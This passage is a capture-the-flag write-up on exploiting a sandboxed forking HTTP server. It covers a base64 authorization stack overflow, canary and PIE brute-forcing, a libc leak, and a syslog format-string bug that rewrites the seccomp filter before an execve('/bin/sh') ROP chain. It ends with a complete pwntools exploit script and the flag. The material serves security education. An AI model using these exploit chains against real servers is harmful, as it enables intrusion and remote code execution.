This means that the child processes are only allowed to use a very select number of syscalls. With these syscalls, even if we manage to exploit a child process, we won't be able to get a shell or read a file. It also seems the BPF filter does not bear any specific weakness.
Auditing the sources: a first vulnerability
Next step is to audit the sources to identify potential vulnerabilities.
We quickly find a problem in worker.c. The following function, checkAuth, takes as input the base64 string that is sent through the Authorization HTTP header (e.g. "Authorization Basic YWRtaW46YWRtaW4=").
It appears the b64_decode function writes the decoded base64 buffer directly to creds without performing any length check for as long as there are bytes to decode. Also a determinant fact is that no null byte is appended to the decoded base64 string. This accounts for a stack-based buffer overflow in the checkAuth method.
We can trigger the bug by sending a request that looks like this. Note that each line feed should be preceded by a carriage return (\r).
GET / HTTP/1.1
Connection: keep-alive
Authorization: Basic QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=
Content-Length: 0
Exploiting the buffer overflow
Leaking canary and PIE
We cannot directly overwrite RIP as there is a canary protection. However, remember that no null byte is appended to our overflowing byte array in the stack. This means we can brute-force the canary one byte at a time:
Every time the server does not crash and we are successfully logged in, means we found a new correct byte.
It is also important to keep the connection alive (Connection: keep-alive) as the parent process will, in this case, loop and fork again to handle the next request. This way, the canary will stay the same across the forked processes.
Once we determined the 8 bytes of the canary, next thing we can do is brute-force the return address in order to leak the PIE base. This works pretty much the same way, although we can speed up the search because we know the return address ends in 0x89e and its two most significant bytes are null.
Leaking libc base
Now that we can overwrite RIP and know the PIE base, we can use a few gadgets from the binary and proceed to leak libc base. This will give us useful gadgets and functions for the next steps.
The idea is simply to use ret2plt: we will use the puts entry in the PLT so that the server leaks a pointer for us. In this case, we arbitrarily decide to leak puts@got which points to libc. As we are given the libc version, we can then calculate its base.
Now... what should we do? We can run arbitrary ROP chains and have access to the whole libc, but we still can't do anything really promising because of the seccomp filter. Time to find something else.
Second vulnerability in the parent process
In order to do anything really interesting such as popping a shell, we would have to escape from the sandbox, for instance by leveraging the parent process.
How can we reach the parent process? Well, recall the main function:
Then, this shared structure is used in the audit function, which serves for logging purposes.
void audit(const struct shared *shared, int status)
{
/* Do not log failed attempts, exit early */
if(WIFEXITED(status) && !shared->loggedin)
return;
/* Initialize the logger */
static bool init = false;
if(!init) {
openlog(IDENT, 0, LOG_DAEMON);
init = true;
}
/* Determine the message and priority */
char msg[0x200];
int prio;
if(WIFEXITED(status)) {
/* Keep track of connections in the audit log */
snprintf(msg, sizeof(msg), "LOGIN %s", shared->username);
prio = LOG_NOTICE;
} else if(WIFSIGNALED(status)) {
/* Signal ? We should warn about this */
snprintf(msg, sizeof(msg), "SIGNAL %d", WTERMSIG(status));
prio = LOG_WARNING;
} else {
/* ??? */
snprintf(msg, sizeof(msg), "UNKNOWN %d", status);
prio = LOG_CRIT;
}
/* Send the actual message to the logger */
syslog(prio, msg, 0);
}
At this point, I was tired and I incorrectly read the source, thinking there was yet another stack-based buffer overflow when the LOGIN %s string was copied to msg with our username (obviously there is not, since it stops at sizeof(msg)). Therefore, I spent a lot of time trying to manage to leak the shared memory pointer so that I could write an arbitrary second stage payload inside it, including null bytes.
Thanksfully, it didn't go to waste as getting such a primitive was still useful to exploit the actual vulnerability, which we will talk about now.
The vulnerability actually lies in the use of this function:
/* Send the actual message to the logger */
syslog(prio, msg, 0);
The syslog function takes a format string as input, and we control the msg buffer because shared->username is copied in it (if we are logged in, i.e. shared->loggedIn == 1). This also requires that the child process returned cleanly (no crash).
Leaking the shared memory pointer
Testing locally, I noticed the offset between the shared mmaped page and the libc base was constant. Therefore, I first finished my exploit by hardcoding this offset in my script.
Obviously, it turned out that this offset was completely wrong on the remote, certainly due to how the kernel manages memory differently.
I explored several methods to leak this pointer. In particular, I wasted a lot of time trying to leak it from the stack:
Leak stack pointer through &environ in libc
Calculate pointer to shared memory pointer in the stack
Leak shared memory pointer
Again, I didn't manage to make it work on the remote as I wasn't able to locate the pointer in the stack (which was, of course, at a different offset than locally).
Especially, my exploit was taking a painfully stupid time to run and I had to wait dozens of minutes each time to brute-force the canary and PIE. Indeed, I had to set a ~500ms timeout for every byte (and even then this was not necessarily enough as I often stumbled upon false positives). Therefore, debugging my exploit on the remote was excruciating.
Next, I tried leaking the shared memory pointer directly with well-chosen gadgets. The shared->username pointer was in rdi at the end of the checkAuth function, so leaking rdi through a ropchain would be enough.
Again, I spent a lot of time trying to chain libc gadgets to move rdi to an interesting register (typically rsi, so that I can write to it through read, or leak it through some function like printf...), without success. I didn't immediately think of writing the register to memory (next time, I will know!). Eventually, I came up with this chain:
payload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(libc_base +0x44c70)# pop rax ; retpayload +=p64(pie_base +0x5000)# random place in .datapayload +=p64(libc_base +0x9711f)# mov qword ptr [rax], rdi ; ret (rdi = shared->username)payload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(pie_base +0x5001)payload +=p64(binary.plt["puts"])# leak the pointer we just copiedpayload +=p64(pie_base +0x289e)# try to return cleanly
Writing a second stage payload to the shared memory
This part is rather straightforward: return to read@plt.
payload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(0x0)# fd: stdinpayload +=p64(libc_base +0x2a4cf)# pop rsi ; retpayload +=p64(shared_memory_ptr)# share->keepalive + logged_in + usernamepayload +=p64(libc_base +0xc7f32)# pop rdx ; retpayload +=p64(0x300)# npayload +=p64(libc.sym["read"])payload +=p64(libc_base +0x44c70)# pop rax ; retpayload +=p64(0x0)payload +=p64(binary.sym["_exit"])# _exit(status=0) to trigger correct path in audit (LOGIN syslog)
It is important to note that we want to exit the process cleanly to trigger the correct path in the audit function next time the parent process runs it. We use the _exit function defined in the binary that directly syscalls exit (the libc exit will not work with the seccomp filter).
After sending this payload, the server will ask for 0x300 bytes and we can overwrite the shared memory as we want.
Exploiting the format string bug
We now fully control shared->username. As we saw earlier, this username is copied through the msg buffer in the audit function and used in syslog, leaving room for a format string type vulnerability.
With that, we can write an arbitrary value in the parent's process memory, but we are constrained to a payload without null byte (as the username is copied with snprintf). Therefore, it is better to use only a single write.
Without stack leak, my solution was to rewrite the BPF filter inside the parent memory so that the next forked child would use hijacked seccomp rules:
payload =b""payload +=b"\x01\x01"# set logged_in=1 to trigger correct pathpayload +=b"AA"# align format string in stackpayload +=br"%32759c%12$hnaaa"+p64(pie_base +0x5066)
This format string writes the word \xFF\x7F at pie_base + 0x5066, which patches the BPF filter in this part so that it always returns SECCOMP_RET_ALLOW:
kill: ret #0x7FFF0000 /* SECCOMP_RET_ALLOW */
allow: ret #0x7FFF0000 /* SECCOMP_RET_ALLOW */
Of course, the pie_base + 0x5066 address should not have a null byte in it (except for the most significant bytes), but this happens only very rarely. Right?
Final stage
Once the BPF filter has been hijacked, the server spawns a new child and a ret2libc concludes the challenge. For some reason it didn't work for me with system so I used execve.
payload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(next(libc.search(b"/bin/sh")))payload +=p64(pie_base +0x2aa1)# pop rsi ; pop r15 ; retpayload +=p64(0x0)payload +=p64(0x0)payload +=p64(libc_base +0xc7f32)# pop rdx ; retpayload +=p64(0x0)payload +=p64(libc.sym["execve"])
As someone who's still relatively not at ease with pwn, I would like to thank the author of this challenge, which I found to be a fun ride with well designed steps.
Exploit script
from pwn import*import base64import timebinary =ELF("./httpd")libc =ELF("./libc.so.6")context.arch ="amd64"context.bits =64if args.REMOTE: p =remote("challenges.france-cybersecurity-challenge.fr", 2058) TIMEOUT =0.2else: p =process(["./httpd_patched"]) TIMEOUT =0.1# Leak canarycanary = [0x00]whilelen(canary)<8: found =Falsefor guess inrange(256): time.sleep(TIMEOUT) payload =b"admin:admin\x00"+b"\x00"* (264-12) payload +=bytes(canary + [guess]) req =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload)) p.send(req) q = p.recvuntil(b"\r\n\r\n", timeout=TIMEOUT)if q andb'flag'in p.recv(4096): canary.append(guess)print(f"Canary: {bytes(canary).hex()}") found =Truebreakifnot found: canary = canary[:-1]canary =int.from_bytes(bytes(canary), byteorder="little")print()# Leak PIE (ret addr)ret_addr = [0x9e]whilelen(ret_addr)<6: found =Falsefor guess inrange(256):iflen(ret_addr)==1and guess %16!=8:continue# ret addr ends with 0x89e time.sleep(TIMEOUT) payload =b"admin:admin\x00"+b"\x00"* (264-12) payload +=p64(canary) payload +=p64(0x1122334455667788)# saved rbp payload +=bytes(ret_addr + [guess]) req =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload)) p.send(req) q = p.recvuntil(b"\r\n\r\n", timeout=TIMEOUT)if q andb'flag'in p.recv(4096): ret_addr.append(guess)print(f"Return address: {bytes(ret_addr).hex()}") found =Truebreakifnot found: ret_addr = ret_addr[:-1]ret_addr =int.from_bytes(bytes(ret_addr), byteorder="little")pie_base = ret_addr -0x289eprint(f"PIE base: 0x{pie_base:016x}\n")binary.address = pie_base# Ropchain to leak libc basepayload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(binary.got["puts"])payload +=p64(binary.plt["puts"])# leak puts@gotpayload +=p64(pie_base +0x289e)# try to return cleanlyreq =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload))p.send(req)q = p.recvline()puts_got =int.from_bytes(q.rstrip()[-6:], byteorder="little")libc_base = puts_got -0x809d0libc.address = libc_baseprint(f"libc base: 0x{libc_base:016x}")# Ropchain to leak shared memory pointerbinary.address = pie_basepayload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(libc_base +0x44c70)# pop rax ; retpayload +=p64(pie_base +0x5000)# random place in .datapayload +=p64(libc_base +0x9711f)# mov qword ptr [rax], rdi ; ret (rdi = shared->username)payload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(pie_base +0x5001)payload +=p64(binary.plt["puts"])# leak the pointer we just copiedpayload +=p64(pie_base +0x289e)# try to return cleanlyreq =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload))p.send(req)q = p.recv(4096)shared_memory_ptr =int.from_bytes(b"\x00"+ q.rstrip()[-5:], byteorder="little")-0x100print(f"shared memory pointer: 0x{shared_memory_ptr:016x}")# Ropchain that writes second stage payload to shared memorypayload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(0x0)# fd: stdinpayload +=p64(libc_base +0x2a4cf)# pop rsi ; retpayload +=p64(shared_memory_ptr)# share->keepalive + logged_in + usernamepayload +=p64(libc_base +0xc7f32)# pop rdx ; retpayload +=p64(0x300)# npayload +=p64(libc.sym["read"])payload +=p64(libc_base +0x44c70)# pop rax ; retpayload +=p64(0x0)payload +=p64(binary.sym["_exit"])# _exit(status=0) to trigger correct path in audit (LOGIN syslog)req =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload))p.send(req)# Exploit format string in parent process (audit->syslog)# Rewrite seccomp BPF filter_0 to allow all syscalls (\x00\x80 -> \xFF\x7F ALLOW)payload =b""payload +=b"\x01\x01"# set logged_in=1 to trigger correct pathpayload +=b"AA"# align format string in stackpayload +=br"%32759c%12$hnaaa"+p64(pie_base +0x5066)print(payload)whilelen(payload)<0x300: payload +=b"\x00"p.send(payload)# Finally, next fork will be seccomped with our hijacked BPF filter# ret2libc our way to shellpayload =b"admin:admin\x00"+b"\x00"* (264-12)payload +=p64(canary)payload +=p64(0x1122334455667788)# saved rbppayload +=p64(pie_base +0x2aa3)# pop rdi ; retpayload +=p64(next(libc.search(b"/bin/sh")))payload +=p64(pie_base +0x2aa1)# pop rsi ; pop r15 ; retpayload +=p64(0x0)payload +=p64(0x0)payload +=p64(libc_base +0xc7f32)# pop rdx ; retpayload +=p64(0x0)payload +=p64(libc.sym["execve"])req =b"""GET / HTTP/1.1\rConnection: keep-alive\rAuthorization: Basic REPLACE\rContent-Length: 0\r\r""".replace(b"REPLACE", base64.b64encode(payload))p.send(req)p.interactive()p.close()"""FCSC{d87c69143541ae0d3e43f8d65bff7072646cdc781167b89aedf0146cb20ed3cd}"""